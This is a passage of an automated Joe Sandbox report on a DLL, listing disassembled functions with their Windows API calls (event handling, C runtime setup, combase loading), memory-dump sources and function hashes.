                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 6CEB3D36
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressCompareErrorExchangeHandleInterlockedLastModuleProc
                              • String ID: ,Wl$CancelIoEx$KERNEL32
                              • API String ID: 3007240809-635205114
                              • Opcode ID: a61aca4cc042abe29e21b1306d461fe08ae5cb15222cdaa278a20f505d898af7
                              • Instruction ID: 56bbac36d8c750cabdb9f5c38a54e9b153dc41691e31e545274e6597ce1b26f6
                              • Opcode Fuzzy Hash: a61aca4cc042abe29e21b1306d461fe08ae5cb15222cdaa278a20f505d898af7
                              • Instruction Fuzzy Hash: 49319F75604742DFD714CF64C955A6AB7B8FF59328F200A2DE965A7B80DF30A808CB91
                              APIs
                              • OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 6CEC9E10
                              • CloseHandle.KERNEL32(00000000), ref: 6CEC9E25
                              • ResetEvent.KERNEL32(00000000), ref: 6CEC9E2F
                              • CloseHandle.KERNEL32(00000000,321BCB28), ref: 6CEC9E64
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,321BCB28), ref: 6CEC9EDA
                              • CloseHandle.KERNEL32(00000000), ref: 6CEC9EEF
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateOpenReset
                              • String ID:
                              • API String ID: 1285874450-0
                              • Opcode ID: 24faa4d86b590b436daa8c773942a09415ae090c489152bb59ba81ddff603e53
                              • Instruction ID: 36333799dd320a6ee5dae764066a05b56d4362e7ceb7c1e2a64af798a4fbbf6f
                              • Opcode Fuzzy Hash: 24faa4d86b590b436daa8c773942a09415ae090c489152bb59ba81ddff603e53
                              • Instruction Fuzzy Hash: BC413D71E05359DFDF10CFA5C944B9EBBB8AB0971CF244219E439AB780D734A905CBA2
                              APIs
                                • Part of subcall function 6CECA640: OpenEventA.KERNEL32(00100002,00000000,?,?,?,6CEC9E8E,?,?), ref: 6CECA66F
                                • Part of subcall function 6CECA640: CloseHandle.KERNEL32(00000000,?,?,6CEC9E8E,?,?), ref: 6CECA684
                                • Part of subcall function 6CECA640: SetEvent.KERNEL32(00000000,6CEC9E8E,?,?), ref: 6CECA697
                              • OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 6CEC9E10
                              • CloseHandle.KERNEL32(00000000), ref: 6CEC9E25
                              • ResetEvent.KERNEL32(00000000), ref: 6CEC9E2F
                              • CloseHandle.KERNEL32(00000000,321BCB28), ref: 6CEC9E64
                              • __CxxThrowException@8.LIBCMT ref: 6CEC9E95
                                • Part of subcall function 6CECCCAA: RaiseException.KERNEL32(?,?,?,6CEEA73C,?,00000400,?,?,?,6CECC2EF,?,6CEEA73C,?,00000001), ref: 6CECCCFF
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,321BCB28), ref: 6CEC9EDA
                              • CloseHandle.KERNEL32(00000000), ref: 6CEC9EEF
                                • Part of subcall function 6CECA380: GetCurrentProcessId.KERNEL32(?), ref: 6CECA3D9
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,321BCB28), ref: 6CEC9EFF
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                              • String ID:
                              • API String ID: 2227236058-0
                              • Opcode ID: 9887fdf08b9d04355a39b1973d739e00a48c3a9c82a6eb2cd82ef9d69c6e3ed6
                              • Instruction ID: 4bfa57363cec1490ab4f8975f6db359a932312c3d989d153e2165bc180d07b3e
                              • Opcode Fuzzy Hash: 9887fdf08b9d04355a39b1973d739e00a48c3a9c82a6eb2cd82ef9d69c6e3ed6
                              • Instruction Fuzzy Hash: 84315D71E053199FDB10CAA58944B9EB7B8AF1571DF240219E839EB780D730A905CB62
                              APIs
                              • __init_pointers.LIBCMT ref: 6CECE4E4
                                • Part of subcall function 6CED0C52: EncodePointer.KERNEL32(00000000,00000001,6CECE4E9,6CECC319,6CEEAD58,00000008,6CECC4DF,?,00000001,?,6CEEAD78,0000000C,6CECC47E,?,00000001,?), ref: 6CED0C55
                                • Part of subcall function 6CED0C52: __initp_misc_winsig.LIBCMT ref: 6CED0C70
                                • Part of subcall function 6CED0C52: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6CED1781
                                • Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6CED1795
                                • Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6CED17A8
                                • Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6CED17BB
                                • Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6CED17CE
                                • Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 6CED17E1
                                • Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 6CED17F4
                                • Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 6CED1807
                                • Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 6CED181A
                                • Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 6CED182D
                                • Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 6CED1840
                                • Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 6CED1853
                                • Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 6CED1866
                                • Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 6CED1879
                                • Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 6CED188C
                                • Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 6CED189F
                              • __mtinitlocks.LIBCMT ref: 6CECE4E9
                              • __mtterm.LIBCMT ref: 6CECE4F2
                                • Part of subcall function 6CECE55A: DeleteCriticalSection.KERNEL32(?,?,?,?,6CECC3E4,6CECC3CA,6CEEAD58,00000008,6CECC4DF,?,00000001,?,6CEEAD78,0000000C,6CECC47E,?), ref: 6CED1088
                                • Part of subcall function 6CECE55A: _free.LIBCMT ref: 6CED108F
                                • Part of subcall function 6CECE55A: DeleteCriticalSection.KERNEL32(6CEED978,?,?,6CECC3E4,6CECC3CA,6CEEAD58,00000008,6CECC4DF,?,00000001,?,6CEEAD78,0000000C,6CECC47E,?,00000001), ref: 6CED10B1
                              • __calloc_crt.LIBCMT ref: 6CECE517
                              • __initptd.LIBCMT ref: 6CECE539
                              • GetCurrentThreadId.KERNEL32 ref: 6CECE540
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                              • String ID:
                              • API String ID: 3567560977-0
                              • Opcode ID: e44a64e99fd5a70298c24eb7d9d4b61ec494b8a7d59e8507694b282a0103fbcf
                              • Instruction ID: 43bbda00f41fcf7568b3795ef2ace30ec50b1ae640c91799c7ab885b797f00c8
                              • Opcode Fuzzy Hash: e44a64e99fd5a70298c24eb7d9d4b61ec494b8a7d59e8507694b282a0103fbcf
                              • Instruction Fuzzy Hash: F0F0963730AF6159E66466B8BE026CA2BB49B0267DB31461DF474C6BC0FF10D44681D6
                              APIs
                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,6CECBCDD,?), ref: 6CECBC2E
                              • GetProcAddress.KERNEL32(00000000), ref: 6CECBC35
                              • EncodePointer.KERNEL32(00000000), ref: 6CECBC41
                              • DecodePointer.KERNEL32(00000001,6CECBCDD,?), ref: 6CECBC5E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                              • String ID: RoInitialize$combase.dll
                              • API String ID: 3489934621-340411864
                              • Opcode ID: fc95c2f803a65bd387c1e0761ae72d094655d2048ab35c0e28f800821e331452
                              • Instruction ID: f23faf9781737bc55695275610ffc12094dea6122f30100e575fb629b3ad7933
                              • Opcode Fuzzy Hash: fc95c2f803a65bd387c1e0761ae72d094655d2048ab35c0e28f800821e331452
                              • Instruction Fuzzy Hash: 94E01A71B90380AFEF915F75DD4CF043678A78A7CAFA05964B226D9180CF754088EF50
                              APIs
                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,6CECBC03), ref: 6CECBD03
                              • GetProcAddress.KERNEL32(00000000), ref: 6CECBD0A
                              • EncodePointer.KERNEL32(00000000), ref: 6CECBD15
                              • DecodePointer.KERNEL32(6CECBC03), ref: 6CECBD30
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
